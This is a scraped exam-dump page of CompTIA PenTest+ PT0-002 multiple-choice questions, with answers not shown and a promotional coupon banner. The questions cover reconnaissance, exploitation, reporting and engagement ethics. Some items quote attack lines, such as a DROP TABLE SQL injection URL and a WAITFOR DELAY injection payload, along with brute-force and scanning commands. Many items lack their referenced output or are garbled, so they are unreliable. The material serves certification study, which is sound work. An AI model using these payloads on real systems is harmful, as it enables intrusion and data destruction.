Pre-Winter Special Limited Time 65% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: geek65

PT0-002 CompTIA PenTest+ Certification Exam Questions and Answers

Questions 4

A company’s Chief Executive Officer has created a secondary home office and is concerned that the WiFi service being used is vulnerable to an attack. A penetration tester is hired to test the security of the WiFi’s router.

Which of the following is MOST vulnerable to a brute-force attack?

Options:

A.

WPS

B.

WPA2-EAP

C.

WPA-TKIP

D.

WPA2-PSK

Buy Now
Questions 5

Which of the following BEST describe the OWASP Top 10? (Choose two.)

Options:

A.

The most critical risks of web applications

B.

A list of all the risks of web applications

C.

The risks defined in order of importance

D.

A web-application security standard

E.

A risk-governance and compliance framework

F.

A checklist of Apache vulnerabilities

Buy Now
Questions 6

A penetration tester runs a scan against a server and obtains the following output:

21/tcp open ftp Microsoft ftpd

| ftp-anon: Anonymous FTP login allowed (FTP code 230)

| 03-12-20 09:23AM 331 index.aspx

| ftp-syst:

135/tcp open msrpc Microsoft Windows RPC

139/tcp open netbios-ssn Microsoft Windows netbios-ssn

445/tcp open microsoft-ds Microsoft Windows Server 2012 Std

3389/tcp open ssl/ms-wbt-server

| rdp-ntlm-info:

| Target Name: WEB3

| NetBIOS_Computer_Name: WEB3

| Product_Version: 6.3.9600

|_ System_Time: 2021-01-15T11:32:06+00:00

8443/tcp open http Microsoft IIS httpd 8.5

| http-methods:

|_ Potentially risky methods: TRACE

|_http-server-header: Microsoft-IIS/8.5

|_http-title: IIS Windows Server

Which of the following command sequences should the penetration tester try NEXT?

Options:

A.

ftp 192.168.53.23

B.

smbclient \\\\WEB3\\IPC$ -I 192.168.53.23 –U guest

C.

ncrack –u Administrator –P 15worst_passwords.txt –p rdp 192.168.53.23

D.

curl –X TRACE https://192.168.53.23:8443/index.aspx

E.

nmap –-script vuln –sV 192.168.53.23

Buy Now
Questions 7

A penetration tester who is performing a physical assessment of a company’s security practices notices the company does not have any shredders inside the office building. Which of the following techniques would be BEST to use to gain confidential information?

Options:

A.

Badge cloning

B.

Dumpster diving

C.

Tailgating

D.

Shoulder surfing

Buy Now
Questions 8

A software development team is concerned that a new product's 64-bit Windows binaries can be deconstructed to the underlying code. Which of the following tools can a penetration tester utilize to help the team gauge what an attacker might see in the binaries?

Options:

A.

Immunity Debugger

B.

OllyDbg

C.

GDB

D.

Drozer

Buy Now
Questions 9

A penetration tester exploited a unique flaw on a recent penetration test of a bank. After the test was completed, the tester posted information about the exploit online along with the IP addresses of the exploited machines. Which of the following documents could hold the penetration tester accountable for this action?

Options:

A.

ROE

B.

SLA

C.

MSA

D.

NDA

Buy Now
Questions 10

A penetration tester conducted an assessment on a web server. The logs from this session show the following:

http://www.thecompanydomain.com/servicestatus.php?serviceID=892 &serviceID=892 ‘ ; DROP TABLE SERVICES; --

Which of the following attacks is being attempted?

Options:

A.

Clickjacking

B.

Session hijacking

C.

Parameter pollution

D.

Cookie hijacking

E.

Cross-site scripting

Buy Now
Questions 11

A penetration tester has established an on-path attack position and must now specially craft a DNS query response to be sent back to a target host. Which of the following utilities would BEST support this objective?

Options:

A.

Socat

B.

tcpdump

C.

Scapy

D.

dig

Buy Now
Questions 12

A penetration tester has completed an analysis of the various software products produced by the company under assessment. The tester found that over the past several years the company has been including vulnerable third-party modules in multiple products, even though the quality of the organic code being developed is very good. Which of the following recommendations should the penetration tester include in the report?

Options:

A.

Add a dependency checker into the tool chain.

B.

Perform routine static and dynamic analysis of committed code.

C.

Validate API security settings before deployment.

D.

Perform fuzz testing of compiled binaries.

Buy Now
Questions 13

Which of the following describe the GREATEST concerns about using third-party open-source libraries in application code? (Choose two.)

Options:

A.

The libraries may be vulnerable

B.

The licensing of software is ambiguous

C.

The libraries’ code bases could be read by anyone

D.

The provenance of code is unknown

E.

The libraries may be unsupported

F.

The libraries may break the application

Buy Now
Questions 14

A penetration tester ran an Nmap scan on an Internet-facing network device with the –F option and found a few open ports. To further enumerate, the tester ran another scan using the following command:

nmap –O –A –sS –p- 100.100.100.50

Nmap returned that all 65,535 ports were filtered. Which of the following MOST likely occurred on the second scan?

Options:

A.

A firewall or IPS blocked the scan.

B.

The penetration tester used unsupported flags.

C.

The edge network device was disconnected.

D.

The scan returned ICMP echo replies.

Buy Now
Questions 15

A large client wants a penetration tester to scan for devices within its network that are Internet facing. The client is specifically looking for Cisco devices with no authentication requirements. Which of the following settings in Shodan would meet the client’s requirements?

Options:

A.

“cisco-ios” “admin+1234”

B.

“cisco-ios” “no-password”

C.

“cisco-ios” “default-passwords”

D.

“cisco-ios” “last-modified”

Buy Now
Questions 16

When preparing for an engagement with an enterprise organization, which of the following is one of the MOST important items to develop fully prior to beginning the penetration testing activities?

Options:

A.

Clarify the statement of work.

B.

Obtain an asset inventory from the client.

C.

Interview all stakeholders.

D.

Identify all third parties involved.

Buy Now
Questions 17

Given the following output:

User-agent:*

Disallow: /author/

Disallow: /xmlrpc.php

Disallow: /wp-admin

Disallow: /page/

During which of the following activities was this output MOST likely obtained?

Options:

A.

Website scraping

B.

Website cloning

C.

Domain enumeration

D.

URL enumeration

Buy Now
Questions 18

Which of the following protocols or technologies would provide in-transit confidentiality protection for emailing the final security assessment report?

Options:

A.

S/MIME

B.

FTPS

C.

DNSSEC

D.

AS2

Buy Now
Questions 19

A penetration tester has found indicators that a privileged user's password might be the same on 30 different Linux systems. Which of the following tools can help the tester identify the number of systems on which the password can be used?

Options:

A.

Hydra

B.

John the Ripper

C.

Cain and Abel

D.

Medusa

Buy Now
Questions 20

A penetration tester performs the following command:

curl –I –http2 https://www.comptia.org

Which of the following snippets of output will the tester MOST likely receive?

Options:

A.

Option A

B.

Option B

C.

Option C

D.

Option D

Buy Now
Questions 21

A company hired a penetration tester to do a social-engineering test against its employees. Although the tester did not find any employees’ phone numbers on the company’s website, the tester has learned the complete phone catalog was published there a few months ago.

In which of the following places should the penetration tester look FIRST for the employees’ numbers?

Options:

A.

Web archive

B.

GitHub

C.

File metadata

D.

Underground forums

Buy Now
Questions 22

A penetration tester has identified several newly released CVEs on a VoIP call manager. The scanning tool the tester used determined the possible presence of the CVEs based off the version number of the service. Which of the following methods would BEST support validation of the possible findings?

Options:

A.

Manually check the version number of the VoIP service against the CVE release

B.

Test with proof-of-concept code from an exploit database

C.

Review SIP traffic from an on-path position to look for indicators of compromise

D.

Utilize an nmap –sV scan against the service

Buy Now
Questions 23

A penetration tester completed an assessment, removed all artifacts and accounts created during the test, and presented the findings to the client. Which of the following happens NEXT?

Options:

A.

The penetration tester conducts a retest.

B.

The penetration tester deletes all scripts from the client machines.

C.

The client applies patches to the systems.

D.

The client clears system logs generated during the test.

Buy Now
Questions 24

A penetration tester who is conducting a web-application test discovers a clickjacking vulnerability associated with a login page to financial data. Which of the following should the tester do with this information to make this a successful exploit?

Options:

A.

Perform XSS.

B.

Conduct a watering-hole attack.

C.

Use BeEF.

D.

Use browser autopwn.

Buy Now
Questions 25

A company provided the following network scope for a penetration test:

169.137.1.0/24

221.10.1.0/24

149.14.1.0/24

A penetration tester discovered a remote command injection on IP address 149.14.1.24 and exploited the system. Later, the tester learned that this particular IP address belongs to a third party. Which of the following stakeholders is responsible for this mistake?

Options:

A.

The company that requested the penetration test

B.

The penetration testing company

C.

The target host's owner

D.

The penetration tester

E.

The subcontractor supporting the test

Buy Now
Questions 26

Which of the following provides a matrix of common tactics and techniques used by attackers along with recommended mitigations?

Options:

A.

NIST SP 800-53

B.

OWASP Top 10

C.

MITRE ATT&CK framework

D.

PTES technical guidelines

Buy Now
Questions 27

A company obtained permission for a vulnerability scan from its cloud service provider and now wants to test the security of its hosted data.

Which of the following should the tester verify FIRST to assess this risk?

Options:

A.

Whether sensitive client data is publicly accessible

B.

Whether the connection between the cloud and the client is secure

C.

Whether the client's employees are trained properly to use the platform

D.

Whether the cloud applications were developed using a secure SDLC

Buy Now
Questions 28

User credentials were captured from a database during an assessment and cracked using rainbow tables. Based on the ease of compromise, which of the following algorithms was MOST likely used to store the passwords in the database?

Options:

A.

MD5

B.

bcrypt

C.

SHA-1

D.

PBKDF2

Buy Now
Questions 29

A penetration tester is reviewing the following SOW prior to engaging with a client:

“Network diagrams, logical and physical asset inventory, and employees’ names are to be treated as client confidential. Upon completion of the engagement, the penetration tester will submit findings to the client’s Chief Information Security Officer (CISO) via encrypted protocols and subsequently dispose of all findings by erasing them in a secure manner.”

Based on the information in the SOW, which of the following behaviors would be considered unethical? (Choose two.)

Options:

A.

Utilizing proprietary penetration-testing tools that are not available to the public or to the client for auditing and inspection

B.

Utilizing public-key cryptography to ensure findings are delivered to the CISO upon completion of the

engagement

C.

Failing to share with the client critical vulnerabilities that exist within the client architecture to appease the client’s senior leadership team

D.

Seeking help with the engagement in underground hacker forums by sharing the client’s public IP address

E.

Using a software-based erase tool to wipe the client’s findings from the penetration tester’s laptop

F.

Retaining the SOW within the penetration tester’s company for future use so the sales team can plan future engagements

Buy Now
Questions 30

A consultant just performed a SYN scan of all the open ports on a remote host and now needs to remotely identify the type of services that are running on the host. Which of the following is an active reconnaissance tool that would be BEST to use to accomplish this task?

Options:

A.

tcpdump

B.

Snort

C.

Nmap

D.

Netstat

E.

Fuzzer

Buy Now
Questions 31

A penetration tester discovered a code repository and noticed passwords were hashed before they were stored in the database with the following code? salt = ‘123’ hash = hashlib.pbkdf2_hmac(‘sha256’, plaintext, salt, 10000) The tester recommended the code be updated to the following salt = os.urandom(32) hash = hashlib.pbkdf2_hmac(‘sha256’, plaintext, salt, 10000) Which of the following steps should the penetration tester recommend?

Options:

A.

Changing passwords that were created before this code update

B.

Keeping hashes created by both methods for compatibility

C.

Rehashing all old passwords with the new code

D.

Replacing the SHA-256 algorithm to something more secure

Buy Now
Questions 32

Which of the following would assist a penetration tester the MOST when evaluating the susceptibility of top-level executives to social engineering attacks?

Options:

A.

Scraping social media for personal details

B.

Registering domain names that are similar to the target company's

C.

Identifying technical contacts at the company

D.

Crawling the company's website for company information

Buy Now
Questions 33

Which of the following factors would a penetration tester most likely consider when testing at a location?

Options:

A.

Determine if visas are required.

B.

Ensure all testers can access all sites.

C.

Verify the tools being used are legal for use at all sites.

D.

Establish the time of the day when a test can occur.

Buy Now
Questions 34

During an assessment, a penetration tester was able to access the organization's wireless network from outside of the building using a laptop running Aircrack-ng. Which of the following should be recommended to the client to remediate this issue?

Options:

A.

Changing to Wi-Fi equipment that supports strong encryption

B.

Using directional antennae

C.

Using WEP encryption

D.

Disabling Wi-Fi

Buy Now
Questions 35

Which of the following situations would MOST likely warrant revalidation of a previous security assessment?

Options:

A.

After detection of a breach

B.

After a merger or an acquisition

C.

When an organization updates its network firewall configurations

D.

When most of the vulnerabilities have been remediated

Buy Now
Questions 36

A penetration tester utilized Nmap to scan host 64.13.134.52 and received the following results:

Based on the output, which of the following services are MOST likely to be exploited? (Choose two.)

Options:

A.

Telnet

B.

HTTP

C.

SMTP

D.

DNS

E.

NTP

F.

SNMP

Buy Now
Questions 37

During a penetration test, a tester is in close proximity to a corporate mobile device belonging to a network administrator that is broadcasting Bluetooth frames.

Which of the following is an example of a Bluesnarfing attack that the penetration tester can perform?

Options:

A.

Sniff and then crack the WPS PIN on an associated WiFi device.

B.

Dump the user address book on the device.

C.

Break a connection between two Bluetooth devices.

D.

Transmit text messages to the device.

Buy Now
Questions 38

Given the following script:

while True:

print ("Hello World")

Which of the following describes True?

Options:

A.

A while loop

B.

A conditional

C.

A Boolean operator

D.

An arithmetic operator

Buy Now
Questions 39

In Python socket programming, SOCK_DGRAM type is:

Options:

A.

reliable.

B.

matrixed.

C.

connectionless.

D.

slower.

Buy Now
Questions 40

A penetration tester wrote the following Bash script to brute force a local service password:

..ting as expected. Which of the following changes should the penetration tester make to get the script to work?

Options:

A.

..e

cho "The correct password is $p" && break)

ho "The correct password is $p" I| break

B.

.e

cho "The correct password is $p" && break)

o "The correct password is $p" I break

C.

e

cho "The correct password is Sp" && break)

echo "The correct password is $p" && break)

D.

.

{ echo "The correct password is $p" && break )

With

E.

( echo "The correct password is $p" && break )

Buy Now
Questions 41

During the assessment of a client's cloud and on-premises environments, a penetration tester was able to gain ownership of a storage object within the cloud environment using the provided on-premises credentials. Which of the following best describes why the tester was able to gain access?

Options:

A.

Federation misconfiguration of the container

B.

Key mismanagement between the environments

C.

laaS failure at the provider

D.

Container listed in the public domain

Buy Now
Questions 42

A penetration tester ran a simple Python-based scanner. The following is a snippet of the code:

Which of the following BEST describes why this script triggered a `probable port scan` alert in the organization's IDS?

Options:

A.

sock.settimeout(20) on line 7 caused each next socket to be created every 20 milliseconds.

B.

*range(1, 1025) on line 1 populated the portList list in numerical order.

C.

Line 6 uses socket.SOCK_STREAM instead of socket.SOCK_DGRAM

D.

The remoteSvr variable has neither been type-hinted nor initialized.

Buy Now
Questions 43

A penetration tester learned that when users request password resets, help desk analysts change users' passwords to 123change. The penetration tester decides to brute force an internet-facing webmail to check which users are still using the temporary password. The tester configures the brute-force tool to test usernames found on a text file and the... Which of the following techniques is the penetration tester using?

Options:

A.

Password brute force attack

B.

SQL injection

C.

Password spraying

D.

Kerberoasting

Buy Now
Questions 44

During a penetration test, the domain names, IP ranges, hosts, and applications are defined in the:

Options:

A.

SOW.

B.

SLA.

C.

ROE.

D.

NDA

Buy Now
Questions 45

A penetration tester runs the following command:

l.comptia.local axfr comptia.local

which of the following types of information would be provided?

Options:

A.

The DNSSEC certificate and CA

B.

The DHCP scopes and ranges used on the network

C.

The hostnames and IP addresses of internal systems

D.

The OS and version of the DNS server

Buy Now
Questions 46

A penetration tester gives the following command to a systems administrator to execute on one of the target servers:

rm -f /var/www/html/G679h32gYu.php

Which of the following BEST explains why the penetration tester wants this command executed?

Options:

A.

To trick the systems administrator into installing a rootkit

B.

To close down a reverse shell

C.

To remove a web shell after the penetration test

D.

To delete credentials the tester created

Buy Now
Questions 47

A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following:

Which of the following combinations of tools would the penetration tester use to exploit this script?

Options:

A.

Hydra and crunch

B.

Netcat and cURL

C.

Burp Suite and DIRB

D.

Nmap and OWASP ZAP

Buy Now
Questions 48

A penetration tester has extracted password hashes from the lsass.exe memory process. Which of the following should the tester perform NEXT to pass the hash and provide persistence with the newly acquired credentials?

Options:

A.

Use Patator to pass the hash and Responder for persistence.

B.

Use Hashcat to pass the hash and Empire for persistence.

C.

Use a bind shell to pass the hash and WMI for persistence.

D.

Use Mimikatz to pass the hash and PsExec for persistence.

Buy Now
Questions 49

Which of the following tools would BEST allow a penetration tester to capture wireless handshakes to reveal a Wi-Fi password from a Windows machine?

Options:

A.

Wireshark

B.

EAPHammer

C.

Kismet

D.

Aircrack-ng

Buy Now
Questions 50

During a penetration tester found a web component with no authentication requirements. The web component also allows file uploads and is hosted on one of the target public web the following actions should the penetration tester perform next?

Options:

A.

Continue the assessment and mark the finding as critical.

B.

Attempting to remediate the issue temporally.

C.

Notify the primary contact immediately.

D.

Shutting down the web server until the assessment is finished

Buy Now
Questions 51

A penetration tester has been hired to examine a website for flaws. During one of the time windows for testing, a network engineer notices a flood of GET requests to the web server, reducing the website’s response time by 80%. The network engineer contacts the penetration tester to determine if these GET requests are part of the test. Which of the following BEST describes the purpose of checking with the penetration tester?

Options:

A.

Situational awareness

B.

Rescheduling

C.

DDoS defense

D.

Deconfliction

Buy Now
Questions 52

A penetration tester is evaluating a company's network perimeter. The tester has received limited information about defensive controls or countermeasures, and limited internal knowledge of the testing exists. Which of the following should be the FIRST step to plan the reconnaissance activities?

Options:

A.

Launch an external scan of netblocks.

B.

Check WHOIS and netblock records for the company.

C.

Use DNS lookups and dig to determine the external hosts.

D.

Conduct a ping sweep of the company's netblocks.

Buy Now
Questions 53

After compromising a system, a penetration tester wants more information in order to decide what actions to take next. The tester runs the following commands:

Which of the following attacks is the penetration tester most likely trying to perform?

Options:

A.

Metadata service attack

B.

Container escape techniques

C.

Credential harvesting

D.

Resource exhaustion

Buy Now
Questions 54

Penetration tester who was exclusively authorized to conduct a physical assessment noticed there were no cameras pointed at the dumpster for company. The penetration tester returned at night and collected garbage that contained receipts for recently purchased networking :. The models of equipment purchased are vulnerable to attack. Which of the following is the most likely next step for the penetration?

Options:

A.

Alert the target company of the discovered information.

B.

Verify the discovered information is correct with the manufacturer.

C.

Scan the equipment and verify the findings.

D.

Return to the dumpster for more information.

Buy Now
Questions 55

A software company has hired a security consultant to assess the security of the company's software development practices. The consultant opts to begin reconnaissance by performing fuzzing on a software binary. Which of the following vulnerabilities is the security consultant MOST likely to identify?

Options:

A.

Weak authentication schemes

B.

Credentials stored in strings

C.

Buffer overflows

D.

Non-optimized resource management

Buy Now
Questions 56

A penetration tester was able to compromise a web server and move laterally into a Linux web server. The tester now wants to determine the identity of the last user who signed in to the web server. Which of the following log files will show this activity?

Options:

A.

/var/log/messages

B.

/var/log/last_user

C.

/var/log/user_log

D.

/var/log/lastlog

Buy Now
Questions 57

Which of the following is the most secure method for sending the penetration test report to the client?

Options:

A.

Sending the penetration test report on an online storage system.

B.

Sending the penetration test report inside a password-protected ZIP file.

C.

Sending the penetration test report via webmail using an HTTPS connection.

D.

Encrypting the penetration test report with the client’s public key and sending it via email.

Buy Now
Questions 58

A CentOS computer was exploited during a penetration test. During initial reconnaissance, the penetration tester discovered that port 25 was open on an internal

Sendmail server. To remain stealthy, the tester ran the following command from the attack machine:

Which of the following would be the BEST command to use for further progress into the targeted network?

Options:

A.

nc 10.10.1.2

B.

ssh 10.10.1.2

C.

nc 127.0.0.1 5555

D.

ssh 127.0.0.1 5555

Buy Now
Questions 59

Company.com has hired a penetration tester to conduct a phishing test. The tester wants to set up a fake log-in page and harvest credentials when target employees click on links in a phishing email. Which of the following commands would best help the tester determine which cloud email provider the log-in page needs to mimic?

Options:

A.

dig company.com MX

B.

whois company.com

C.

cur1 www.company.com

D.

dig company.com A

Buy Now
Questions 60

During an assessment, a penetration tester found a suspicious script that could indicate a prior compromise. While reading the script, the penetration tester noticed the following lines of code:

Which of the following was the script author trying to do?

Options:

A.

Spawn a local shell.

B.

Disable NIC.

C.

List processes.

D.

Change the MAC address

Buy Now
Questions 61

During an assessment, a penetration tester manages to exploit an LFI vulnerability and browse the web log for a target Apache server. Which of the following steps would the penetration tester most likely try NEXT to further exploit the web server? (Choose two.)

Options:

A.

Cross-site scripting

B.

Server-side request forgery

C.

SQL injection

D.

Log poisoning

E.

Cross-site request forgery

F.

Command injection

Buy Now
Questions 62

A company recently moved its software development architecture from VMs to containers. The company has asked a penetration tester to determine if the new containers are configured correctly against a DDoS attack. Which of the following should a tester perform first?

Options:

A.

Test the strength of the encryption settings.

B.

Determine if security tokens are easily available.

C.

Perform a vulnerability check against the hypervisor.

D.

.Scan the containers for open ports.

Buy Now
Questions 63

A penetration tester uncovers access keys within an organization's source code management solution. Which of the following would BEST address the issue? (Choose two.)

Options:

A.

Setting up a secret management solution for all items in the source code management system

B.

Implementing role-based access control on the source code management system

C.

Configuring multifactor authentication on the source code management system

D.

Leveraging a solution to scan for other similar instances in the source code management system

E.

Developing a secure software development life cycle process for committing code to the source code management system

F.

Creating a trigger that will prevent developers from including passwords in the source code management system

Buy Now
Questions 64

A penetration tester opened a shell on a laptop at a client's office but is unable to pivot because of restrictive ACLs on the wireless subnet. The tester is also aware that all laptop users have a hard-wired connection available at their desks. Which of the following is the BEST method available to pivot and gain additional access to the network?

Options:

A.

Set up a captive portal with embedded malicious code.

B.

Capture handshakes from wireless clients to crack.

C.

Span deauthentication packets to the wireless clients.

D.

Set up another access point and perform an evil twin attack.

Buy Now
Questions 65

Which of the following is a rules engine for managing public cloud accounts and resources?

Options:

A.

Cloud Custodian

B.

Cloud Brute

C.

Pacu

D.

Scout Suite

Buy Now
Questions 66

A tester who is performing a penetration test discovers an older firewall that is known to have serious vulnerabilities to remote attacks but is not part of the original list of IP addresses for the engagement. Which of the

following is the BEST option for the tester to take?

Options:

A.

Segment the firewall from the cloud.

B.

Scan the firewall for vulnerabilities.

C.

Notify the client about the firewall.

D.

Apply patches to the firewall.

Buy Now
Questions 67

Which of the following situations would require a penetration tester to notify the emergency contact for the engagement?

Options:

A.

The team exploits a critical server within the organization.

B.

The team exfiltrates PII or credit card data from the organization.

C.

The team loses access to the network remotely.

D.

The team discovers another actor on a system on the network.

Buy Now
Questions 68

A penetration tester, who is doing an assessment, discovers an administrator has been exfiltrating proprietary company information. The administrator offers to pay the tester to keep quiet. Which of the following is the BEST action for the tester to take?

Options:

A.

Check the scoping document to determine if exfiltration is within scope.

B.

Stop the penetration test.

C.

Escalate the issue.

D.

Include the discovery and interaction in the daily report.

Buy Now
Questions 69

While performing the scanning phase of a penetration test, the penetration tester runs the following command:

........v -sV -p- 10.10.10.23-28

....ip scan is finished, the penetration tester notices all hosts seem to be down. Which of the following options should the penetration tester try next?

Options:

A.

-su

B.

-pn

C.

-sn

D.

-ss

Buy Now
Questions 70

A penetration tester is conducting an assessment against a group of publicly available web servers and notices a number of TCP resets returning from one of the web servers. Which of the following is MOST likely causing the TCP resets to occur during the assessment?

Options:

A.

The web server is using a WAF.

B.

The web server is behind a load balancer.

C.

The web server is redirecting the requests.

D.

The local antivirus on the web server Is rejecting the connection.

Buy Now
Questions 71

Given the following code:

Which of the following data structures is systems?

Options:

A.

A tuple

B.

A tree

C.

An array

D.

A dictionary

Buy Now
Questions 72

Which of the following would a company's hunt team be MOST interested in seeing in a final report?

Options:

A.

Executive summary

B.

Attack TTPs

C.

Methodology

D.

Scope details

Buy Now
Questions 73

A security engineer is trying to bypass a network IPS that isolates the source when the scan exceeds 100 packets per minute. The scope of the scan is to identify web servers in the 10.0.0.0/16 subnet.

Which of the following commands should the engineer use to achieve the objective in the least amount of time?

Options:

A.

nmap -T3 -p 80 10.0.0.0/16 -- max-hostgroup 100

B.

nmap -TO -p 80 10.0.0.0/16

C.

nmap -T4 -p 80 10.0.0.0/16 -- max-rate 60

D.

nmap -T5 -p 80 10.0.0.0/16 -- min-rate 80

Buy Now
Questions 74

A penetration tester managed to exploit a vulnerability using the following payload:

IF (1=1) WAIT FOR DELAY '0:0:15'

Which of the following actions would best mitigate this type ol attack?

Options:

A.

Encrypting passwords

B.

Parameterizing queries

C.

Encoding output

D.

Sanitizing HTML

Buy Now
Questions 75

A penetration tester fuzzes an internal server looking for hidden services and applications and obtains the following output:

Which of the following is the most likely explanation for the output?

Options:

A.

The tester does not have credentials to access the server-status page.

B.

The admin directory cannot be fuzzed because it is forbidden.

C.

The admin, test, and db directories redirect to the log-in page.

D.

The robots.txt file has six entries in it.

Buy Now
Questions 76

A penetration tester is attempting to perform reconnaissance on a customer's external-facing footprint and reviews a summary of the fingerprinting scans:

SSH servers: 23

NTP servers: 4

Rsync servers: 5

LDAP servers: 2

Which of the following OSs is the organization most likely using?

Options:

A.

Mac OS X

B.

FreeBSD

C.

Microsoft Windows

D.

Linux

Buy Now
Questions 77

A penetration tester is conducting an assessment of an organization that has both a web and mobile application. While testing the user profile page, the penetration tester notices that additional data is returned in the API response, which is not displayed in the web user interface. Which of the following is the most effective technique to extract sensitive user data?

Options:

A.

Compare PI I from data leaks to publicly exposed user profiles.

B.

Target the user profile page with a denial-of-service attack.

C.

Target the user profile page with a reflected XSS attack.

D.

Compare the API response fields to GUI fields looking for PH.

Buy Now
Questions 78

A penetration tester is conducting an assessment on 192.168.1.112. Given the following output:

Which of the following is the penetration tester conducting?

Options:

A.

Port scan

B.

Brute force

C.

Credential stuffing

D.

DoS attack

Buy Now
Questions 79

Which of the following documents would be the most helpful in determining who is at fault for a temporary outage that occurred during a penetration test?

Options:

A.

Non-disclosure agreement

B.

Business associate agreement

C.

Assessment scope and methodologies

D.

Executive summary

Buy Now
Questions 80

A security firm is discussing the results of a penetration test with a client. Based on the findings, the client wants to focus the remaining time on a critical network segment. Which of the following best describes the action taking place?

Options:

A.

Maximizing the likelihood of finding vulnerabilities

B.

Reprioritizing the goals/objectives

C.

Eliminating the potential for false positives

D.

Reducing the risk to the client environment

Buy Now
Questions 81

A penetration tester is working to enumerate the PLC devices on the 10.88.88.76/24 network. Which of the following commands should the tester use to achieve the objective in a way that minimizes the risk of affecting the PLCs?

Options:

A.

nmap —script=s7-info -p 102 10.88.88.76/24 -T3

B.

nmap —script=wsdd-discover -p 3702 -sUlO.88.88.76/24

C.

nmap --script=iax2-version -p 4569 -sU -V 10.88.88.76/24 -T2

D.

nmap --script=xll-access -p 6000-6009 10.88.88.76/24

Buy Now
Questions 82

During a code review assessment, a penetration tester finds the following vulnerable code inside one of the web application files:

<% String id = request.getParameter("id"); %>

Employee ID: <%= id %>

Which of the following is the best remediation to prevent a vulnerability from being exploited, based on this code?

Options:

A.

Parameterized queries

B.

Patch application

C.

Output encoding

Buy Now
Questions 83

A penetration tester is trying to bypass an active response tool that blocks IP addresses that have more than 100 connections per minute. Which of the following commands would allow the tester to finish the test without being blocked?

Options:

A.

nmap -sU -p 1-1024 10.0.0.15

B.

nmap -p 22,25, 80, 3389 -T2 10.0.0.15 -Pn

C.

nmap -T5 -p 1-65535 -A 10.0.0.15

D.

nmap -T3 -F 10.0.0.15

Buy Now
Questions 84

A penetration tester performs several Nmap scans against the web application for a client.

INSTRUCTIONS

Click on the WAF and servers to review the results of the Nmap scans. Then click on

each tab to select the appropriate vulnerability and remediation options.

If at any time you would like to bring back the initial state of the simulation, please

click the Reset All button.

Options:

Buy Now
Questions 85

A penetration tester is conducting an assessment for an e-commerce company and successfully copies the user database to the local machine. After a closer review, the penetration tester identifies several high-profile celebrities who have active user accounts with the online service. Which of the following is the most appropriate next step?

Options:

A.

Contact the high-profile celebrities.

B.

Delete the high-profile accounts.

C.

Immediately contact the client.

D.

Record the findings in the penetration test report.

Buy Now
Questions 86

A penetration tester captures SMB network traffic and discovers that users are mistyping the name of a fileshare server. This causes the workstations to send out requests attempting to resolve the fileshare server's name. Which of the following is the best way for a penetration tester to exploit this situation?

Options:

A.

Relay the traffic to the real file server and steal documents as they pass through.

B.

Host a malicious file to compromise the workstation.

C.

Reply to the broadcasts with a fake IP address to deny access to the real file server.

D.

Respond to the requests with the tester's IP address and steal authentication credentials.

Buy Now
Questions 87

A penetration tester noticed that an employee was using a wireless headset with a smartphone. Which of the following methods would be best to use to intercept the communications?

Options:

A.

Multiplexing

B.

Bluejacking

C.

Zero-day attack

D.

Smurf attack

Buy Now
Questions 88

Which of the following tools can a penetration tester use to brute force a user password over SSH using multiple threads?

Options:

A.

CeWL

B.

John the Ripper

C.

Hashcat

D.

Hydra

Buy Now
Questions 89

During a client engagement, a penetration tester runs the following Nmap command and obtains the following output:

nmap -sV -- script ssl-enum-ciphers -p 443 remotehost

| TLS_ECDHE_ECDSA_WITH_RC4_128_SHA

| TLS_ECDHE_RSA_WITH_RC4_128_SHA

| TLS_RSA_WITH_RC4_128_SHA (rsa 2048)

TLS_RSA_WITH_RC4_128_MD5 (rsa 2048)

Which of the following should the penetration tester include in the report?

Options:

A.

Old, insecure ciphers are in use.

B.

The 3DES algorithm should be deprecated.

C.

2,048-bit symmetric keys are incompatible with MD5.

D.

This server should be upgraded to TLS 1.2.

Buy Now
Questions 90

A penetration tester was hired to test Wi-Fi equipment. Which of the following tools should be used to gather information about the wireless network?

Options:

A.

Kismet

B.

Burp Suite

C.

BeEF

D.

WHOIS

Buy Now
Questions 91

A penetration testing firm wants to hire three additional consultants to support a newly signed long-term contract with a major customer. The following is a summary of candidate

background checks:

Which of the following candidates should most likely be excluded from consideration?

Options:

A.

Candidate 1

B.

Candidate 2

C.

Candidate 3

D.

Candidate 4

Buy Now
Questions 92

During an engagement, a junior penetration tester found a multihomed host that led to an unknown network segment. The penetration tester ran a port scan against the network segment, which caused an outage at the customer's factory. Which of the following documents should the junior penetration tester most likely follow to avoid this issue in the future?

Options:

A.

NDA

B.

MSA

C.

ROE

D.

SLA

Buy Now
Questions 93

Which of the following types of information would most likely be included in an application security assessment report addressed to developers? (Select two).

Options:

A.

Use of non-optimized sort functions

B.

Poor input sanitization

C.

Null pointer dereferences

D.

Non-compliance with code style guide

E.

Use of deprecated Javadoc tags

F.

A cyclomatic complexity score of 3

Buy Now
Questions 94

Given the following code:

$p = (80, 110, 25)

$network = (192.168.0)

$range = 1 .. 254

$ErrorActionPreference = 'silentlycontinue'

$Foreach ($add in $range)

$Foreach ($x in $p)

{ {$ip = "{0} . {1} -F $network, $add"

If (Test-Connection -BufferSize 32 -Count 1 -quiet -ComputerName $ip)

{$socket = new-object System.Net. Sockets. TcpClient (&ip, $x)

If ($socket. Connected) { $ip $p open"

$socket. Close () }

}

}}

Which of the following tasks could be accomplished with the script?

Options:

A.

Reverse shell

B.

Ping sweep

C.

File download

D.

Port scan

Buy Now
Questions 95

A penetration tester is performing an assessment for an application that is used by large organizations operating in the heavily regulated financial services industry. The penetration tester observes that the default Admin User account is enabled and appears to be used several times a day by unfamiliar IP addresses. Which of the following is the most appropriate way to remediate this issue?

Options:

A.

Increase password complexity.

B.

Implement system hardening.

C.

Restrict simultaneous user log-ins.

D.

Require local network access.

Buy Now
Questions 96

Which of the following elements of a penetration testing report aims to provide a normalized and standardized representation of discovered vulnerabilities and the overall threat they present to an affected system or network?

Options:

A.

Executive summary

B.

Vulnerability severity rating

C.

Recommendations of mitigation

D.

Methodology

Buy Now
Questions 97

A penetration tester executes the following Nmap command and obtains the following output:

Which of the following commands would best help the penetration tester discover an exploitable service?

A)

B)

C)

D)

Options:

A.

nmap -v -p 25 -- soript smtp-enum-users remotehost

B.

nmap -v -- script=mysql-info.nse remotehost

C.

nmap --ocript=omb-brute.noe remotehoat

D.

nmap -p 3306 -- script "http*vuln*" remotehost

Buy Now
Questions 98

After performing a web penetration test, a security consultant is ranking the findings by criticality. Which of the following standards or methodologies would be best for the consultant to use for reference?

